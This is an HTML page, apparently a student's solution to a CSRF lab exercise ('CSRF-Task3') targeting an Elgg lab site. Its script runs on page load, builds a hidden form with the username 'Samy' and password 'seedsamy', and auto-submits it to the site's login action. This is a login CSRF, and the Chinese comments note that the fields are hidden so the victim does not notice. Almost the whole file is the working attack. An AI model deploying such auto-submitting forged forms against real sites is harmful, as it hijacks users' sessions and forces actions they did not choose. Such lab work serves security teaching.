<html>

<head>
    <title> CSRF-Task3 by wxf </title>
</head>

<body>
    <h1>
        CSRF TASK 3
    </h1>
    <script type="text/javascript">
        // 提交表单函数
        function post(url, fields) {
            // 创建一个 <form> 元素
            var p = document.createElement("form");
            // 构造表单
            p.action = url;
            p.innerHTML = fields;
            p.target = "_self";
            p.method = "post";
            // 将这个form表单添加到当前页面中
            document.body.appendChild(p);
            // 提交form表单
            p.submit();
        }
        // CSRF攻击函数
        function csrf_hack() {
            var fields;
            // 构造登录Elgg的表单
            // description的内容设置为伪造的话
            // 表单的类型是隐藏(hidden)的, 使得受害者不会察觉
            fields += "<input type='hidden' name='username' value='Samy'>";
            fields += "<input type='hidden' name='password' value='seedsamy'>";
            fields += "<input type='hidden' name='returntorefer' value='true'>";
            var url = "http://www.csrflabelgg.com/action/login";
            post(url, fields);
        }
        // 当页面窗口加载时调用攻击函数
        window.onload = function () { csrf_hack(); }
    </script>
</body>

</html>

